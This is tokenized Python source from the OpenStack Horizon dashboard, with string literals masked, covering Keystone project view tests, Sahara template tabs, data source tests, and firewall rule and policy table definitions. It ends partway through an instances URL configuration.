id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:2> , warning = <NUM_LIT:0> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_when_default_role_does_not_exist ( self ) : <EOL> project = self . tenants . first ( ) <EOL> domain_id = project . domain_id <EOL> quota = self . quotas . first ( ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( None ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . 
get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> try : <EOL> logging . disable ( logging . ERROR ) <EOL> with self . assertRaises ( exceptions . NotFound ) : <EOL> self . client . get ( url ) <EOL> finally : <EOL> logging . disable ( logging . NOTSET ) <EOL> class UsageViewTests ( test . BaseAdminViewTests ) : <EOL> def _stub_nova_api_calls ( self , nova_stu_enabled = True ) : <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . cinder , '<STR_LIT>' ) <EOL> api . nova . extension_supported ( <EOL> '<STR_LIT>' , IsA ( http . HttpRequest ) ) . AndReturn ( nova_stu_enabled ) <EOL> def _stub_neutron_api_calls ( self , neutron_sg_enabled = True ) : <EOL> self . mox . StubOutWithMock ( api . neutron , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> if neutron_sg_enabled : <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( neutron_sg_enabled ) <EOL> api . network . floating_ip_supported ( IsA ( http . HttpRequest ) ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> if neutron_sg_enabled : <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> def test_usage_csv ( self ) : <EOL> self . 
_test_usage_csv ( nova_stu_enabled = True ) <EOL> def test_usage_csv_disabled ( self ) : <EOL> self . _test_usage_csv ( nova_stu_enabled = False ) <EOL> def _test_usage_csv ( self , nova_stu_enabled = True ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = api . nova . NovaUsage ( self . usages . first ( ) ) <EOL> self . _stub_nova_api_calls ( nova_stu_enabled ) <EOL> api . nova . extension_supported ( <EOL> '<STR_LIT>' , IsA ( http . HttpRequest ) ) . AndReturn ( nova_stu_enabled ) <EOL> start = datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> end = datetime . datetime ( now . year , now . month , now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> if nova_stu_enabled : <EOL> api . nova . usage_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , <EOL> start , end ) . AndReturn ( usage_obj ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . cinder . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . cinder_limits [ '<STR_LIT>' ] ) <EOL> self . _stub_neutron_api_calls ( ) <EOL> self . mox . ReplayAll ( ) <EOL> project_id = self . tenants . first ( ) . id <EOL> csv_url = reverse ( '<STR_LIT>' , <EOL> args = [ project_id ] ) + "<STR_LIT>" <EOL> res = self . client . get ( csv_url ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . context [ '<STR_LIT>' ] , usage . ProjectUsage ) ) <EOL> hdr = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' % hdr ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' , False ) , <EOL> "<STR_LIT>" ) <EOL> class SeleniumTests ( test . SeleniumAdminTestCase ) : <EOL> @ test . create_stubs ( <EOL> { api . keystone : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ) <EOL> def test_inline_editing_update ( self ) : <EOL> api . keystone . 
tenant_list ( IgnoreArg ( ) , <EOL> domain = None , <EOL> marker = None , <EOL> paginate = True ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> api . keystone . tenant_update ( <EOL> IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> description = '<STR_LIT>' , <EOL> enabled = True , <EOL> name = u'<STR_LIT>' ) <EOL> changed_tenant = copy . copy ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> changed_tenant . name = u'<STR_LIT>' <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( changed_tenant ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % ( self . live_server_url , INDEX_URL ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cell_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button = edit_button_wrapper . find_element_by_tag_name ( '<STR_LIT>' ) <EOL> action_chains = ActionChains ( self . selenium ) <EOL> action_chains . move_to_element ( cell_wrapper ) . click ( edit_button ) <EOL> action_chains . perform ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_name ( "<STR_LIT>" ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> name_input = td_element . find_element_by_tag_name ( '<STR_LIT:input>' ) <EOL> name_input . send_keys ( keys . Keys . HOME ) <EOL> name_input . 
send_keys ( "<STR_LIT>" ) <EOL> td_element . find_element_by_class_name ( '<STR_LIT>' ) . click ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> data_wrapper = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( data_wrapper . text == u'<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ test . create_stubs ( <EOL> { api . keystone : ( '<STR_LIT>' , '<STR_LIT>' ) } ) <EOL> def test_inline_editing_cancel ( self ) : <EOL> api . keystone . tenant_list ( IgnoreArg ( ) , <EOL> domain = None , <EOL> marker = None , <EOL> paginate = True ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % ( self . live_server_url , INDEX_URL ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cell_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button = edit_button_wrapper . find_element_by_tag_name ( '<STR_LIT>' ) <EOL> action_chains = ActionChains ( self . selenium ) <EOL> action_chains . move_to_element ( cell_wrapper ) . click ( edit_button ) <EOL> action_chains . perform ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_name ( "<STR_LIT>" ) ) <EOL> td_element = self . selenium . 
find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> td_element . find_element_by_class_name ( '<STR_LIT>' ) . click ( ) <EOL> data_wrapper = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( data_wrapper . text == u'<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . base : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> def test_membership_list_loads_correctly ( self ) : <EOL> member_css_class = "<STR_LIT>" <EOL> users = self . users . list ( ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( False ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( False ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( self . domain ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( self . quotas . first ( ) ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( self . roles . first ( ) ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = self . domain . id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = self . domain . id ) . AndReturn ( self . groups . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % <EOL> ( self . live_server_url , <EOL> reverse ( '<STR_LIT>' ) ) ) <EOL> members = self . selenium . 
find_element_by_css_selector ( member_css_class ) <EOL> for user in users : <EOL> self . assertIn ( user . name , members . text ) </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import nova <EOL> from openstack_dashboard . api import sahara as saharaclient <EOL> from openstack_dashboard . dashboards . project . data_processing . utils import workflow_helpers as helpers <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class GeneralTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . cluster_template_get ( request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class NodeGroupsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . cluster_template_get ( request , template_id ) <EOL> for ng in template . node_groups : <EOL> if not ng [ "<STR_LIT>" ] : <EOL> continue <EOL> ng [ "<STR_LIT>" ] = ( <EOL> nova . flavor_get ( request , ng [ "<STR_LIT>" ] ) . name ) <EOL> ng [ "<STR_LIT>" ] = helpers . safe_call ( <EOL> saharaclient . nodegroup_template_get , <EOL> request , ng . get ( "<STR_LIT>" , None ) ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class ClusterTemplateDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( GeneralTab , NodeGroupsTab , ) <EOL> sticky = True </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> DETAILS_URL = reverse ( <EOL> '<STR_LIT>' , args = [ '<STR_LIT:id>' ] ) <EOL> class DataProcessingDataSourceTests ( test . TestCase ) : <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . sahara . data_source_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . data_sources . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT:Name>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , ) } ) <EOL> def test_details ( self ) : <EOL> api . sahara . data_source_get ( IsA ( http . HttpRequest ) , IsA ( unicode ) ) . AndReturn ( self . data_sources . list ( ) [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( DETAILS_URL ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_delete ( self ) : <EOL> data_source = self . data_sources . first ( ) <EOL> api . sahara . data_source_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . data_sources . list ( ) ) <EOL> api . sahara . data_source_delete ( IsA ( http . HttpRequest ) , data_source . id ) <EOL> self . mox . ReplayAll ( ) <EOL> form_data = { '<STR_LIT:action>' : '<STR_LIT>' % data_source . id } <EOL> res = self . client . 
post ( INDEX_URL , form_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import network <EOL> from openstack_dashboard . api import nova <EOL> from openstack_dashboard . api import sahara as saharaclient <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class GeneralTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . nodegroup_template_get ( <EOL> request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> flavor = nova . flavor_get ( request , template . flavor_id ) <EOL> except Exception : <EOL> flavor = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> floating_ip_pool_name = None <EOL> if template . floating_ip_pool : <EOL> try : <EOL> floating_ip_pool_name = self . _get_floating_ip_pool_name ( <EOL> request , template . floating_ip_pool ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template , "<STR_LIT>" : flavor , <EOL> "<STR_LIT>" : floating_ip_pool_name } <EOL> def _get_floating_ip_pool_name ( self , request , pool_id ) : <EOL> pools = [ pool for pool in network . floating_ip_pools_list ( <EOL> request ) if pool . id == pool_id ] <EOL> return pools [ <NUM_LIT:0> ] . name if pools else pool_id <EOL> class ConfigsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . 
nodegroup_template_get ( <EOL> request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class NodegroupTemplateDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( GeneralTab , ConfigsTab , ) <EOL> sticky = True </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . template import defaultfilters as filters <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . translation import ungettext_lazy <EOL> from horizon import tables <EOL> from openstack_dashboard import policy <EOL> class AddRuleLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class AddPolicyLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class AddFirewallLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeleteRuleLink ( policy . PolicyTargetMixin , tables . DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeletePolicyLink ( policy . PolicyTargetMixin , tables . 
DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeleteFirewallLink ( policy . PolicyTargetMixin , <EOL> tables . DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class UpdateRuleLink ( policy . PolicyTargetMixin , tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , rule ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : rule . id } ) <EOL> return base_url <EOL> class UpdatePolicyLink ( policy . PolicyTargetMixin , tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> class UpdateFirewallLink ( policy . PolicyTargetMixin , tables . 
LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , firewall ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : firewall . id } ) <EOL> return base_url <EOL> class InsertRuleToPolicyLink ( policy . PolicyTargetMixin , <EOL> tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> class RemoveRuleFromPolicyLink ( policy . PolicyTargetMixin , <EOL> tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> def get_rules_name ( datum ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( [ rule . name or rule . id [ : <NUM_LIT> ] <EOL> for rule in datum . rules ] ) <EOL> def get_policy_name ( datum ) : <EOL> if datum . policy : <EOL> return datum . policy . name or datum . policy . id <EOL> def get_policy_link ( datum ) : <EOL> return reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : datum . policy . id } ) <EOL> class RulesTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> protocol = tables . Column ( "<STR_LIT>" , <EOL> filters = ( lambda v : filters . default ( v , _ ( "<STR_LIT>" ) ) , <EOL> filters . 
upper , ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> source_ip_address = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> source_port = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> destination_ip_address = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> destination_port = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> action = tables . Column ( "<STR_LIT:action>" , <EOL> filters = ( filters . upper , ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> enabled = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> firewall_policy_id = tables . Column ( get_policy_name , <EOL> link = get_policy_link , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddRuleLink , DeleteRuleLink ) <EOL> row_actions = ( UpdateRuleLink , DeleteRuleLink ) <EOL> class PoliciesTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> firewall_rules = tables . Column ( get_rules_name , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> audited = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddPolicyLink , DeletePolicyLink ) <EOL> row_actions = ( UpdatePolicyLink , InsertRuleToPolicyLink , <EOL> RemoveRuleFromPolicyLink , DeletePolicyLink ) <EOL> class FirewallsTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> firewall_policy_id = tables . Column ( get_policy_name , <EOL> link = get_policy_link , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> status = tables . 
Column ( "<STR_LIT:status>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddFirewallLink , DeleteFirewallLink ) <EOL> row_actions = ( UpdateFirewallLink , DeleteFirewallLink ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . instances import views <EOL> INSTANCES = r'<STR_LIT>' <EOL> INSTANCES_KEYPAIR = r'<STR_LIT>' <EOL> VIEW_MOD = '<STR_LIT>' <EOL> urlpatterns = patterns ( <EOL> VIEW_MOD , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . LaunchInstanceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . UpdateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . RebuildView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % 